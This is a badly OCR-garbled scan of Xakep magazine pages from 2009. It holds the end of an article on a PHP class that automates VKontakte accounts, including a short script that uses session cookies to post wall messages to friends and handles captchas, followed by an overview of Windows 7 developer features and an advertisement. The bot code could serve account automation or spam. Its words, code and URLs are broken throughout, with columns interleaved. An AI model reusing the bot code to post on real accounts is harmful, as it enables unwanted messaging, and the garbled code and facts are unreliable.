.+++ captcha_sid, $captcha_key) , которая обращается к скрипту по // вызываем фУНКЦИР;' для ПОiТYчения СПИСка друзей ..
адресу .bJ..!.J:LLLvkonlakte.ru/wall.php, передавая в него данные $m->Er_rec($cookies);

'+++
методом РО5Т Входящими параметрами функции являются со­
ответственно; параметр wall_hash; пара метр mid; собственные
cookles; само сообщение; специальный id-KOA теста captcha; и
ключ теста caplcha [последниедва пара метра, как и В предыду­
щих случаях, могут иметь нулевые значения. если не нужны]. В
случае успешной отправки ВОЗ8ращаетсязначение 1,8 случае
.1.1
//

(/
получаем tйССИВ кешей настенного сообщеfDfЯ для

11-Т'0 друга Е списке друзей (fr_i~ass [1]

$wa11=$m->usеr_wа11_hаsh($m->fr_mаss[lJ

$cookies) ;

sleep ( "5" ); (.1

[10J,

делаем задержку в

посылаем сообщение другу

5 секунд

[10])

I­ ,

облома - О; если система затребовала тест captcha- функция $re=$m- >send_wall ($",аl1 [1] , $·"all [2], $cookies,

Ij-+++
возвращаетего id-номер аутентификации. $mess, "О", "О");

// выводим результа"'ы функции send_wa11 (!

НАГЛЯДНЫЕ ПРИМЕРЫ echo $re;

.+++ Свободно использовать описанные выше функции можно и без по· ?>

нимания их сути, НО зто не путь воина. Поступивший так читатель

будет проклят Николаем GOrl'OM, а его проклятие в области со­ А здесь - и вовсе 1О строчек. Кстати, несмотря на то, что вы­

временной черной магии дорогого стоит. Для кодеров, желающих шеприведенные примеры довольно примитивны, они довольно
Ка
.+++ познатьДзен кодинга для социальных сетей [вплоть до написания ясно демонстрируют работу класса .
качественных ботов), на диске лежит бонус -
на РН Р, требующий подключенной библиотеки
класс. написанный
Curl с версией ЗАКЛЮЧЕНИЕ
ror
РНР, начиная с пятой. Ты можешь сам доработать и оптимизиро­ Надеюсь, что приведенная в этой статье информация будет Са
.+++
вать код или дополнить класс новыми функциями, если сочтешь использована исключительнов общественно-полезныхцелях.

необходимым. - это дело практики. Влюбом случае. будут вопро· «ВКонтакте», как и большинстводругих популярных социальных
и ~
сы - пиши мне на почту. В дальнейшем на своем сайте Я буду вы­ сетей, хорошо защитил своих пользователейи дал им возмож­
кладывать обновления зтого класса и проводить обсуждения его ность в полной мере наслаждаться использованиемпредостав­

.+++
дополнений и общего качества работы. Присоединяйся J ленных сервисов. Но если человек глуп и наивен, то на про· ИНФО

Теперьдавай рассмотрим ПРОСТой код скрипта, который отправ­ сторах интернета никакая программная защита не способна его
ляет сообще ние другу: уберечь. В общем, успехов и удач и В творческих порывах I I
€)::
:~.+++ ~106 ХАКЕР 06 {126/ 09
 porPAMMA

EMbl
НОВОСТИ ИГРОВОГО МИРА

.j

'/' r Р/

~j! ~
I
'1;:
.'.
, I
--. ,,/~~

­.
,
,
,
,
.r
'. .:;,:. Г! ,
...... 'r;: )
#,
"
::::' ;"" ~ ,'. ,- ~-_:_-,-':'------

. .,
~ .,I(

--

~Г.
W~'" ..:' .

~
."./

-
/(' / .. "
.,/
~.,
, /
,
~ tj-f1'
.....-
/­
j
........ ,...-
I
,.-Г
,/:- ':""
~- .,,'''''''

F" r \
V
:-",.-:-:-:.:, ......-
I .
- /

Каждый день, 20:00

Подробная информация
Горячие новости мира компьютерныхи видеоигр на сайте gameland.tv
Самая свежая информация об индустрии
и репортажи с мест событий * Игра Pгototype

•
ИНФОРМАЦИЮ О ПОДКЛЮЧЕНИИ ТРЕБУЙТЕ У ВАШЕГО РЕГИОНАЛЬНОГО ОПЕРАТОРА TAIOКE В &ОЛЕЕ 100 КАI5ЕЛЬНЫХСЕТЕЙ РФ

o ·.8 акаоо ~ ... 40rbInBO rt:5>-<.,i

,
ЭР·ТЕЛЕКDМ тeoe7i
mРИКОl10рmв
. EВI_ 'l\,ufanet
 ....' ..'.. (:0 d'lrlg

:;~,;;~

SENSOR ДРР
~
L ii,ig}~ДLlО:[jНI (А'.Ч :
,«<,.~ ,
LOCATION ДРР
,-,~
~

it
LISER
SENSOR API CONTROL Pдr-..JEL

CI:J
l_+++

~+++ ..... "

UMDF
O::=:J SENSOR DRIVER

-+++ ,,
,,
I АРХИТЕКТУРА
,!, WINDOWS SENSOR
,, '.../ PD 08JECTS
-+++ , IPortablo?Do?vico?Vauo?s PLATFORM
~------~------~-­ IPo.... tab1о? Do?y i со? Va uo?sCo11 o?ct io Гl::: -----~
i Г'_-:'.I IPortab,le-Dеviсе:::Ко?уСоЛо?сtiоns

-~++

ИГОРЬ АНТОНОВ.
.......
~~..:::-~

I A"T.O~Y ,'GOR.I(HV@GM~~L:,CO"'.!

г+++

Cr=:J
[_+++
WI,NDOWS7

-+++
ДЛЯ РАЗРАБОТЧИКА
O=J
Технологическиенововведения,прогнозируе'Мыев новой ОСи
-+++
Wi,nd,ows7 - пожалуй, первая операционная система от Мiсгоsоft,
'-+++ в которой программиста ждет столько интересныхтехнологий. Не­

O:=:J смотря на то, что финальный релиз еще не готов, уже есть реальная

-+++ возможность познакомиться со всеми ее новинками и даже опробо­

I
вать многие из них на практике.
I

[1~+++ ВЗАИМОДЕЙСТВИЕ кой мультисеНСОРНОI'Оввода. Технология ты рас~ошелишься на соответствующий

~
СЖЕЛЕЗОМ MultiTouch Iправильнеесказать' Windows мони~J.
L...J......-...
Ты, наверное, уже в курсе. что в новой Винде TouchJ реализована пра~тически В полном Для реализации всех фишек технологии

-+++ ~ардинальныt-1образоt-1 изt-1енился графиче­ объеt-1е. Если ты прешься от интерфейса Windows Touch, раэработчи~и приготовили
ский интерфейс. Ка~утверждаетМ5, он стал iРhопе. то приготовься, - то же самое можно большой набор АРI-функций, поэтоt-1у встро­
еще проще, пушистее и обзавелся поддерж­ будет делать и в Wlf1dows 7 kat-1o собой, если ить в СВОЮ программу поддержку интерфейса

--t++ ~ 108 ХА·КЕР 06 /Н6/ 09

«MultiTouch» будет достаточно легко. Для это­
го в АРI имеются функции, позволяющие нау­
чить приложение распознавать стандартные
жесты \лапонные для других припожениЙ\. В
большинстве приложений особые <'BbIKpYTa­
сы» не нужны. позтому этих функций хватит
за глаза. А если 'гебе окажется их мало (само
собой, ведь наши планы не имеют границ).
то к твоим услугам - пакет низкоуровневых
АРI-интерфейсов, с помощью котороголегко
можно будет решить нестандартную задачу
!например, придумать свой жест и забиндить
на него реакцию системыl.
ПЛДТФОРМАДЕВДЙ­
СОВ (WINDOWS DEVICE
PLATFORM)
Еще одна интересная технология. играющая
немаловажную роль в «семерке». Трудно
представить современный комп без допол ни­
тельныхдевайсов и всевоэможных гаджетов
Принтер. сканер. mр3-плеер. труба - устрой­
ства, которые имеются у большинства юзе­
ров Испольэоватьдевайсы по назначению­
дело нехитрое, а вот разработка приложений
для взаимодействия с зтими устройствами
напоминаетпесню группы Sepultura. Про­
блема не нова. но в Windows 7 ее попытались
решить с помощью соэдания целой платфор­
мы Windows Devlce PlatJorm. Суть этого «ноу­
хау» заключается в создании набора АРI для
83а имоде йствия С разл ичны М и устройствами.
Не стоит обольщаться и думать, что после
перехода на Windows 7 ты сразу сможешь
написать мега-синхронизатор для своего
мобильника. Вовсе нет Чтобы воспользо­
ваться всеми препеетями новинки, нужно
подождать, пока производители устройств
реализуют ее поддержку.
WINDOWS BIOMETRIC
FRAMEWORK
В Windows 7 появилась служба для взаимо­
действия с биометрическими устройствами
- Windows Biometrics FrameWork Теперь нет
необходимости использовать специальное
программное обеспечение, поставляемое
производителями биометрических устройств.
Все операции по взаимодействию воэьмет
на себя служба Windows BiometГlc Service. В
составе операционной системы присутствует
специальное приложение. позволяющее
управлять процессом считывания отпечатков
пальцев и уС'Ганавливать соответствующие
политики безопасности. Так. для каждого
пользователя можно закрепить «определен­
ный палец». Успешное считывания отпечатка
будет предоставлять пользователю вход в
Windows или домен.
Все возможности платформы доступны раз­
работчикам в виде набора API-ФункциЙ. Для
многих это будет приятным сюрпризом, так
каксоздавать приложения для взаимодей­
СТВИя С устройствами станет намного проще
и, самое главное, есть все шансы добиться
универсальности. Поскольку работа с устрой­
Х"КЕР 06 /126/ 09
ством происходит через посредника (Windows напрямую, а через службу обеспечивает. как
BiometГlc Service), у программиста отпадет минимум, еще один плюс - это безопасность.
необходимость эаботиться о поддержке Клиентское приложение не имеет прямого
устройств определенных производителей. доступа к устройству. а раз так, то и вероят­
Гпавное, чтобы Windows могла работать с ность изменить конфиденциальные данные
ними. существенно снижается.
Стоитзаметить, что работа с устройством не Но пока в зтой бочке меда чувствуется не­
ПОЛЕЗНЫЕ 'РЕСУ'РСЫ
11ttр:/(ы
gs.msdп.соmлviпdеv-- русская версия блога «Windows 7 fOT DevelopeTs». Прак­
тичесЮl еженедeJIЪНО ПОЯШIЯются интересные посты (достаточно объемные) обо всех
нюансах разработки приложенийдля Windows 7.
htф://wау2сlоud.соm-отличныЙблог по всему, что связано с WindowsAzuтe.Новые и,
главное, полезные посты публикуютсяпрактичеCЮIежедневно. Всем, кто интересуется
«облачными»вычислениямипросмотр обязателен.
hllP-: l/pIogbIog.ru - тематика этого блога: .NET Рт amewoTk И все, что с ним свяэано.
Материалы ресурса будут полезны всем категориям .NET-программистов.
httр:liwiпdоwsstеашЫоg.соm/Ыоgsl dеvеlорегs - англоязычная версил блога "Windows
7 for Developers».
htt;p://aspnetrnania.com- сайтоб ASP .NET. Новости IDIатформы, эксклюзивные статьн,
обзорICНИГИТ.д.
htф://wеЫоgs.аsр.пеt/sсоttgu -блог ScootyGu's, целиком посвящеиный ASP .NET. Из
особенностей можно выделlГГЬ: регулярно пополняемый раздел Tips And Triclcs, новости
ИЗ мира ASP .NET, обзор кннг и т. д. Единственный минус - вся информация на англl1Й­
CI<омяэыке.
h!Шilаsр.пеt/mvс-официальныЙ сайт об ASP .NET и использовании смежных техно­
логий (ЛJАХ, МVC и т. д.). Огромный IDIЮС сайта - подборка скринкастов про иснользо­
вание МVC, ЛJАХ и пр. Одним видеоконтеитом содержимое ресурса не ограничивается
- текстового материала (гайдов, туторов, книг) также предостаточно. Язык ресурса­
английский.
11 Щ>: Iltecl1days.ru - РУСCI<оязычны.й ресурс по новым технологиям и продуктам комна­
шш Microsoft. ОСIiОВНОЙ тиu контента - CI<pHHKacTbl. их количество растет в геометри­
ческой прогрессии , поэтому uосещать ресурс рекомендуется почаще. Все пред ставлен­
ныевидеоматериалы на русском языке.
www.miсгоsоft.соm/whdс! devlce/input/smartcal'd/WBFlnrтo.mspx - подробная инфор­
мация о Windows Biometric Platform. Страница частенько об!:ЮВJtяется, и на ней появля­
ются самые последние сведения о технологии.
http://dОWl1lоаd.miсгоsоft.соm/dосumепts/гus/У''iпdоws!V7DEV.рdf
- беспл:атиая
электронная книга) призванная помочь разработчикам обеспечить совместимость своих
при'Ложеиий С Windows 7.
Iщ:р: /ldownload.microsoft.com/documentslrus/windows!V7IT. pd f - еще одна книга, в
кагоройрассматриваютсявопросысовместимостиприложенийс Windows 7. Однако это
иэдание направлено не на разработчиков, а на IТ -специалистов.
ьttp://ыlgs.шiсгоsоft.со.il/blоgsl/аshа//гсhivе/20091/2/251
wiпdОWS-Z-П'iggег-stагt­
services.aspx- пример демонстрируетразработкуТгiggег-сервисов.
lJttp: 1/code.rnsdn.micTosoft.comlWindowsAPICodePack- альфа-верeuя библиотекн
WindowsAPI Code Pack foг .NET Framework.
~//www.pinvoke.net-прототипы практичесЮlвсех WiпdоWSАРI-фушщийс при­
мерами кода.
~ 1О9
.....
-+++
I
O::J
» coding

1-+++

Provided ьу:
г+++
Microsoft
a::J
Windows Biometric Service Мkгою(t
-+++ IHVflSV
BJometrlc Servlce Provlder
tНVIISV
Engine
-+++ Adapter ОЕМ

C::r:::=J
[_+++

KMDF DriVe,
'"+++
АРХИТЕКТУРАWINDOWS BIOMETRIC SERVICE
O:::::J
It +++ большая ложечка дегтя, а и,менно - поддержка ограниченного круга
устройств На сегодняшний день осуществлена поддержка девайсов

ДЛЯ счи1ы
анияя отпечатков пальцев.

++++
WINDOWSSENSOR AND LOCATION PLATFORM ГОВОРИТ
Windows Sепsогапd Location Platforгll - платформа, созданная для обе­

O:::=:J
спечения взаимодействия ОС с различными датчиками устройств [опять И ПОКАЗЫВАЕТ
вспоминаем iРhопе). Основное ее назначение - дать возможность
1++++
разработчикам создавать "умные" приложения, способные приспоса­ M'ICROSOFT: АЛЕКСЕЙ ФЕДОРОВ,
PARTNERS LEAO ОРЕ

бливаться к условиям среды, в которой работает пользователь, или даже

к его географическому местоположению. iВОПРОСЫ

Если на разработку и гр тебе, мя гко ГО воря, n офиг, то в тулза х новые
технологии будут тоже востребованы. Например, ты можешь заюзать СОВМЕСТИМОСТИ
П:РIИЛОЖЕНИЙ
их при создании "умного» пользовательского интерфейса. "Снимай"
показаliИЯ датчика освещения и, в зависимости от их значений, пре­

доставляй юзеру определенный вид интерфейса. Когда пользователь

работает при солнечном свете, то разумнее всего сделать интерфейс в Windows 7 ноддерживается ряд технологий, обеспечивающих
приложения более контрастным и сувеличенными шрифтами [на совмесrnмость приложений, написанныхдля предыдущих
гля нцевом дисплее при солнечном свете контрастный шрифт будет версий ос. П-специалисты могут решить проблемы совмести­
смотреться лучше), или наоборот, если вокругтемень, - применить к мости с помощью инфраструктуры обеспечения совмеcrимости
интерфейсу насыщенные цвета (Applic.a.tion Compatibility Infrastructure), позволяющей<<латать»
Location Platform - платформа, позволяющая работать с устройствами npиложенияс помощью<сarиаток» (shims) и уровней совме­
определения географического местонахождения обьекта Типичный сrnмоcrи (layers). А разработчикам предоставляются средства
пример - GP5. тестирования при:ложений (Applicarion Verlfier, тестовые угили­
Все возможности этих платформ доступны в виде огромного числа API­ ты для серrnфикации при:ложений), а таюке тестовые сценарии
функций IСн/управляемый код). 8 5DКпроизводителиустройств найдут ДIIЯ сертификации приложеnий - они могут использоваться
специфи кацию разработки драйверов устройств, а разработч и ки при­ для то го, чтобы гарантировать совместимость новых версий при­
кладных решений - интересные при меры использования технологий. ложений в процессе их разрабо11СИ.
Для тех, у кого нет никакихдатчиков [я почему-тоуверен. чтоты тоже из их Инфрас:труктураАррliсаriоп Compatibilitylnfrastrllcture реали­
ч ислаJ, в 50 К n рипасены соответствующие змуляторы. зованаввиде«перехватчиков»ключевыхфункцийWiпdоws
АР! и эмуляциииоведенияиредьщущи:хверсий операциопной
НОВЫЕ ИНТЕРФЕЙСНЫЕ ВОЗМОЖНОСТИ
системы Windows. В настоящее времл сущестuyет более 360
ГАДЖЕТЫ
«затurаток»-отпростых,искажающихномерверсии ОС (более
многю~ юзерам Windows Vista полюбилась за так называемые гад­
50% всех песовместимостейнриложений!)до более комплекс­
же ты - мини-приложения, располагающиеся на 5idеВаги показы­
ных, решающихзадачидоступак файловойсистеме, рееструи
вающие различную, как полезную. так и бесполезную информацию.
т. п. Около 60 уровней совмесrnмостиЭМУ1IИруюТповедениекак
8 Windows 7 от боковой панели решили полностью отказаться, а
предыдущихверсий ОС, так и отдельныхнодсистем.Интересен
гаджеты разместить прямо на рабочем столе. Это прикольнее, чем и такой факт - на уровне Windows 7 RC реализованы «заплатки»
наличие лишней панели, отьедающей немало системных ресурсов и для более чем 6000 при:ложениЙ.По мере созданиярешенийдля
дра гоцен н ого простра нова. Са ма технологи Я разработки гаджетов приложенийсоответствующие«заплатки»распространяются
осталась прежней, за исключением двух маленьких нововведений в составенакетов обновленийОС и включаютсяв специальную
- теперь можно их устанавливать программно, и настраивать показ базуданныхсовместимостей,которая присутстnуетнакаждом
o.!L/H6oA:; с7(7.J/r';'I"~и',/:7Щ;f;,",-I:'пр"'f/800iё? КОМIIбютере.

~ 11а ХАКЕР 06 /126/ 09

 » coding

Неlр

~ '" А' @HD~'Do! 5o.cm Д>Indех ~Contents ~HelpFavorites iJ <> ~ ~14SDNForums ~

jCOnrents ~ 11­ х WeIcome 10 the Wmd<>w. 50К \ ~ х

1-:'-:-:'-----------1'" URL: ms-hеIР:li!-ls,'·'I7SDК.lОЗЗ/sdlantrОihtmJ/';778d9Ьз-е%З-4d7Ь-Ь790·20.Зc9dba_!>6_f.h_Im ~'-\1

.~miii----~III:::< Collapse AII Code: AII

@§'.1*,#'
V'Ie!cometol!1e\'[II'IdO'N'SDK Welcome to the Windows SDK
i1J r.,;gr.oon ."d Inleraperal>1ity ро
V{lfldo',''' 7 A~caoon QuaJjty со
IJJ СomраЬ,Шty
ЕВ Nе'Л' Feawres and enm.n..:emen1.s Welcome to the beta edition о! the Microsoft \'Iindo\'/5 Soft"are Deve!opment Кit (SDK) for \'Jiпdо'.чs 7 and .NEТ
s3 TooIs, Resources, o-nd Guid.;11CJ: Fгаmе'.чогk З.5 Service Pack 1.
ЕВ '/o/indo·,...s 70eveloper Guide
(Е .• NEТ Fram~·(,'ort. De.. .·e!opment The I'Jindo\~5 SDK contain5 а set of tool5, code 5amples, documentation, compiler>;, header>;, and librarie5 that
I.fj \"/еЬ D~""'еlopmелt developers сап U5e to create application5 that run оп Miccosoft \'Vindow5. YOu сап U5e the Windows SDK to write
00 \"ЛnЗ2 (Ir1d СОМ Devefopment арр/icаtiОП5 using the native (\ViПЗ2jСОМ) ог managed (.NEТ Frame"ork) programming model.

Foc acceS5 to additional resource5 and infomlation, 5uch as dO\"inload5, foгum P05ts, and the \!lindow5 SDK team
bJog, go to the Windows SDK Developer Center.

: :< Using the Windows SDK Documentation

The application programming interface (API) documentation contains reference tOpiC5, feature overvie\~s,
and 5ample code for the programming elements availabJe in I'Jindo\vs. If you аге using documentation in5talled
оп your hard drive, you сап locate the topics you need using the Search, Jndex, a'1d Contents tabs. lл
addibon, if you аге inter€5ted in only а sub5et of the documentation, you сап use the Filtered Ьу drop­
dovm Ьох to 5elect опе of the predefined content subsets, Jf уои аге u5ing the online documentation, you
~o...J""'-:.?'~~ t.b,-,-I-,.r..~i-=r- V'""'_'~'''':)~.-I 1~~"'..Ь""'~.J-~61~:-"".E.-r.:DпJ:~о~,.,.У.\ ... nд----....d....t;b""'~<::~~....h-I\"с."""\J ... ,if-Ь.J ;...,.0 C_.o~ ......,d,;, ~j
1"::;;==:;;;;;; ~ 11- х"
ТotIe Location

<. I >
~content;~raH.!p F.... .1
Re.d,

НЕLРДЛЯSDК

ПРОАПГРЕЙЖЕННЫЙTASKBAR
СИСТЕМНЫЕНОВИН,КИ
Самая заметная новинка Windows 7с позиций пользователя - обнов­
РАЗРАБОТЧИКАМ
ленная па нель задач. Причем, не просто обновленная, а полностью
ДРАЙВЕРОВПОСВЯЩАЕТСЯ
переделанная: и в визуальном плане, и сточки зрения функциональ­
Знакомый всем системным программистамнабор Windows OГlverKitTaK­
ности. Реально, новый TaskBar- не просто симпатичная панелька с
же подвергся заметномуулучшению. В третью версию вошла обновлен­

большими кнопками, а целый инструментдля организациибыстрого

ная документация и многочисленныепримеры, признанныеоблегчить

доступа к часто запускаемым приложениям.В связи с зтим, одной из

ЖИЗНЬ кодеру. Среди примеров присутствуютисходники драйверов,
первоочередныхзадач, стоящих перед грамотным разработчиком,
демонстрирующиеиспользованиеновыхтехнологий(например, Sепsог'
будет реализоватьв своем приложении полную поддержкувзаимо­
LocationJ. Разобравшись со всем зтим добром, ты без проблем напишешь
действия с TaskBar. Под взаимодействиемя подразумеваюреализа­
свой драйвер.
цию функций, необходимыхдля использования новых возможностей Кстати. чуть не забыл рассказать о самом важном! В WD К 3.0 реалИЗО­
панели задач. Например, JumpList 'как самая из востребованных вана поддержка анализа статического кода с использованием PRefast.
функций обновленногоTaskBar!. JL, по своей сути, аналогичен меню В состав PRefast входит KOMI10HeHT PREfast foI' Driver для обнаружения
«Пуск», но только дЛя конкретного приложения. В этом контекстном ош ибок в коде драйвероврежима ядра.
меню должны быть ссылки на основные действия программы и пере­
числения последних открытых lесли приложение работает именно с POWERSHELL2.0

содержимымфайловой системы!) файлов и папок. Другим примером Технология PowerShell постепеннозавоевываетсердца админов, при­

возможностей панели задач может быть IconOverLay 1«Перекрывания выкших расходоватьвремя с пользой.Действительно,зачем постоянно
иконок» J. позволиющий ИСпользовать несколько иконок для отобра­
тратить время на выполнениеодной и той же операции,если ее можно

жен ия текущего статуса приложения.

автоматизировать?На PS зто сделатьлегко. Ксчастью, програММ\1рова­
Для организации В своем приложении всех этих функций вWiпdоws 7
ние на PowerShelL не сравнить с аналогичной разрзботкой под bash, а
предусмотрены соответствующие АРI-Функции и интерфейсы. Описание значит, освоитьданную вещьсможет даже начинающий программист.
большинства уже доступно дЛЯ чтения в MSON, а примеры кода приведе­ В Microsoft понимаютперспективутехнологии,позтому в Windows 7
ны В SDK beta и в библиотеке Windows АРI CodePack. представлена новая версия зтого мощного средства, с обновлен нь! м и
ВОЗМОЖНОстями'.

WINDOWS SCENIC RIBBON 1. PowerSheLL обзавелся графической средой разработки. Програм м и ро­
Интерфейс Ribbon, впервые представленныйв MS Office 2007, вать сценарии стало еще n роще и понятнеЙ. Среда обладает всеми необ­

многими был оценен по достоинству. Начиная с Windows 7,
перерос в Scenic RIЬЬОП и стал неотъемлемой частью операционной
системы. Это означает, что теперь можно создавать приложения
с современным интерфейсом как на управляемом коде, так и ис­
пользуя привычныйWiп32 API. В общем, есть, где душе кодерской
разгуляться.
RiЬЬоп ходимыми средствами для комфортной разработки [отладчик, подсветка
синта ксиса и т.д.], что делает процесс разработки схожим с создани ем
приложения в та ких средах как Visual StudlO
2. Количество доступ н ых командлетов существенно возросло. до­
бавились кома ндлеты для получения информации и управления 115,
ActiveDirectoгy \1 т.д.

ХАКЕР 06 /126/ 09 ~ 111

 » coding

~айл Наi1ти Qтключить ВcjД ~ вектоpt1blе Е!1СУНКИ КЭЦ! СеР§.ис Пров~ка ееЖИ~1 обозревателя: !Е8 Режи!:! J1окументов: cтaHJlapTHbI11IE8
·:,._+++

нп-n. I css Сценарий Профили I>-;а.;," ;-п.', • 111

CI ~~Q+t~@'~ IСn1ЛЬ Отслеживать CТI1f\1 PaCКГlaJ11Ca Атрибуты

ёа ht:t:p-еquiv="Rеfrеsn" ссn;;еnё="1800; IJRL=ht:t:p: / /''''''1,'. зесш.'·'! .. 0inherite<l - bcdy

.,.-+++ nJ< t:it:le="RSS" hre!'=''http://I.......... securit:ylaЬ. ru/_Services/E: s.. 0BODY st:yles.css
nJ< href=" /bi t:riл/ссmроnеnts/sесuritуlаЬ/iЫосk. h.istory/tem! :-.~font : lЗРх Ari.al, Иеl~~еtiса, sang-зerif
nk hrеf="/Ьitriл/tеmplаt:еs/sеcuri t:ylab/ cC:tlpcnents/securi ty: L 0оо1ох : ~OOO
nк href="/bitriK/templat:es/securitylaЬ/styles.
сзз" rel="st~ B·0inherite<l - di·....
,._.-+++ yle tуре="tекt/сss->lаблvдас~илей CSS</st:yle> i 130DIV.1e::t:-ьоt:tо:u 8tyles.oss
batext-align : c€ n ter
\\\neaC~x\\\ --> 8 ~IY.~ эt:у1еs.сээ
.• class="header"> 0eorder-bott:c:u : medi~~ попе
.---+++
///}:eeder/// --;~ . ~border-le::t: : medi~~ попе
\\\\\сспtеnti\\\\ --> :·,,0раddinч-ьоt:t:{L~ : Орх
.., class="ccntent-cont"> , . ~margin : Орк
//II/ccntent/I/// ;. '. bapadding-left : Ор){
\\\foot~r\\\ --> 0paddinq-right : Орх
index/> ~J::.oroer-t:op : mediu!t! попе
.• class="left:-bot:t:cm"> '.- 0border-righ.t: : mediu,n попе
<Ш.g W1.dt:h="SOO" hе1.ght:=-Зl" sr="/Ьit:r1.х/imаgеS/Р1.с2,рnч" ·..·0paddinq-t:cp ; Орх
Te:<·~ - Пус:-о% }'3~n ~e7!c"Za в·0DГV',lеft:-Ьоttо:u IY.G эtуlеs.сss
.oindex/> .. ~m-=rqln-t:cp ; 15рх
v сlазз="fооt:еr">
- I//foote~/// -->
ript: t:ype="teKt/j a'Y'asoript">directsOriptdiУ=dосшnеnt:,чеСЕ1!
-+-+++ v id="righ.tscript">
ript: t:уре="tеКt:/jа',таsсriрt:" >direct:script:di·,'=:10clllt'.ent:. get:E1!.J1
L?:J <jj =- ~_}l .)
~

.+-1-++ ИНСТРУМЕНТЫДЛЯ РАЗРАБОТЧИКОВВ 'Е8

3. Поддержка удаленной работы дарит возможность одновременно На момент написания статьи [середина мая) библиотека находится в

.+-+++ выполнять команды на удаленных компьютерах с одного. на котором стадии альфа-версии [ссылку на библиотеку можно найти во врезке). Фи­
работает служба. нальный релиз должен появиться незадолго до релиза самой Windows 7.

~ ._1 -.) 4. Транзакции. Начиная с версии 2 О, ядро и интерфейсы технологии

обза вел ись поддержкой транзакций. WINDOWS7SDK
.,+,+++ 5. Разби вка сценария. В новой версии стало возможно разбивать раз­ Сегодня SDКдля Windows 7 находится в стадии beta и зто означает, что к
рабатываемыесценарии на отдельные составляющие - модули. Таким релизу его содержимое изменится и пополнится новыми интересными

образом, появляется возможность многократного использования кода. при мерами и т.д. Тем не менее. уже сейчас есть, на что посмотреть. Не
буду разбирать все nримеры . а лучше заострю твое дра гоценное внима­

.+-+++ TRIGGER START SERVICE ние на тех, что демонстрируют новые технологии. В первую очередь, зто

Службы Windows издавна считалисьодним из самыхузкихмест в си­ возможности новых платформ. В SDK есть прекрасный при мер использо­
стеме Для бол ьшинства системных сервисов по умолчанию установлен вания «умного» интерфейса. Всем известный MSDN Reader взаимодей­
Q
режим автозапуска при загрузке ОС. Служб немало, и из-за их совместно­ ствует с датчиками освещения и при изменении их показателей' меняет

-+-+++ го старта требуется дополнительноевремя на загрузку ОС. Для решения оформление контента. При увеличении яркости света содержимое
проблемы всегда приходилось выставлять ненужным сервисам режим nриложения станов,\Тся более контрастным (увеличиваютсяшрифты,
запуска «вручную». В Windows 7 рутинные действия не требуются коде­ добавляется жирность, интервал между строх становится больше), а при
рам стала доступна возможность создавать Тгiggег-сервисы Их запуск уменьшении - возвращается в исходное положение. Поскольку наличие

,+-+ ++
зависит отопределенныхсобытиЙ. Например. если ты кодишь сервис для сенсорных датчиков пока считается диковинкой, то для тестирования

взаимодействия с мобильным телефоном. то нет смысла держать сервис примеров придется воспользоваться драйвером-змулятором устройства
в работающем состоянии. пока устройство не будет подключено (поставляется вместе с SDKJ.
Помимо демонстрации Windows Sensor Platlorm, в SDK представлены

1+-+++
в ПОМОЩЬ РАЗРАБОТЧИКУ примеры nрограммированияSuper Ваг lисnользова н ия JumpList и т AJ.
WINDOWSAPI СООЕРАСК создания интерфейса Sсепiс RiЬЬоп, новых возможностей фильтрации
FOR MICROSOFT .NET FRAMEWORK трафика YI т.д. Если ты всерьез собираешься заняться разработкой под
Vista- девелоперы хорошо знаком ы с библиотекой Vista Впdgе, в которой WIndows 7, то обязательно скачай SDK и разбери его примеры в реальных
раализованы все необходимые интерфейсы для доступа ко всем новым условиях (скажем, на Windows 7 RCI.
техн ологиям системы К моменту финал ьного релиэа WI пdоws 7 выйдет

L::::]
аналогичная библиотека с новым именем - W·lпdоws АРI
Windows N ЕТ Framework. Эту библ и отеку будут составлять несколько
либ, обеспечивающихпростой доступ ктаким функциям системы, как.
Библиотеки. WlпdоwsSепsогРlаtfогm.TaskBar. TaksDialogs. Windows
LocatlOn Platform
CodePack for INTERNETEXPLORER8
Наверня ка, ты уже знаешь, что в соста в Windows 7 войдет новая версия
браузера Iпtегпеt Explorer8. Изменения в нем затронули как сам дви­
жок. так и функционал.Начиная с зтой версии. в браузере появились
инструментыдля разработчиков[DeveloperToolsl, - предназначены

~ 112 ХАКЕР 06 1\ 26/ 09

 » codirlg

E.ile !;dit Y.iew !:!.elp

rrFfJ)
-~
То use AppVerifier select an application to test (Ctrl+A), dick the checkboxes next to the tests, and ex~cute the code. Select Viе'Л' to see
properties and I09s. То stop testing an application dick Сtrl-Ю. For mOI'e detaned information see the Help.

Applications T~sts

I 1mage.I\-lа-m-е---------------------.

~"~Basics
uTorrent.exe $"~ Compatibility
[О LO'I~ Resource Simulation
[ О LuaPri\/
I$J.. О l>1iscellaneous
I±J.. О Printing

Properties
Name I Туре Value Description

Propagate Вoolean FALSE---­ Propagate verifier settings from parent process to child process. Note tl1at .

AutoCIr Boolean FALSE After specified image s13rts to run. the verified image 'NiII dear the settings .

AutoDisabIeStop Boolean ТRUE Verifier lЛ'ill only соmрlаiл оп се foг the sam~ issue fouпd.

Logging,I'JjthLOck.. , Вооlеап ТRUE 1'he dlllоаdfuпlоаd e\'ent 'л'iII Ье logged. Verifier is doing 1/0 'Nhеп the load ...

:?ave E~t

УТИЛИТА ДЛЯ ТЕСТИРОВАНИЯ СОВМЕСТИМОСТИ

они для отладки представления страниц И сценариев, написанных на в Windows 7 тебя буд'{l' встречать те же проблемы, что и при переносе в
языке JScript. Используя Developer TooLs, ты можешь изменять значения Windows Vista. Если планируешь перескочить Windows Vista и перенести
любых тегов htmlAoKyMeHTa "на лету» и просматривать результат изме­ свое приложение сразу наWiпdоws 7, то крайне рекомендую сначала

нений. При подгонке дизайна или отладке JScгipt эти возможности буд'{l' обкатать свое творение на Vista.
весьма кстати. СчиТай, Ч1'0 юзаешь FireBug, только в 'Е J Вместо реального тестирования приложения BWindows 7ты можешь
воспользоваться специальной утилитой АррLiсаtlQП Verifier !смотри
ВОПРОСЫ СОВМЕСТИМОСТИ ГJttр:llblоgs.msdп.СОП"lI,позволяющейвыполнитьтест на сов,~естимость
Самый страшный деньдля любого разработчика - тот, когда хорошо без непосредственнойустановки Windows 7 Также очень рекомендую
отлаженное приложение приходится переносить под новую версию ОС. ознако,~иться с электронными книгами: «Обеспечениесовместимости
На этом шаге всплываютвсе нестандартные решения и «хаки", которые приложений. Для разработчика» и "Обеспечение совместимости прило·
затрудняют переход. Чем больше было использовано недокументиро­ жений. ДЛЯ IT -специалиста». 3ти книги распространяются совершенно
ванных функций, тем болезненней будет происходить миграция. Увы, беспла'ГНО, ссылки на их загрузку приведены во врезке.

при использовании обходных маневров, никто не может дать гарантии.

что используемая тобой суперфункция будет существовать в новой вер­
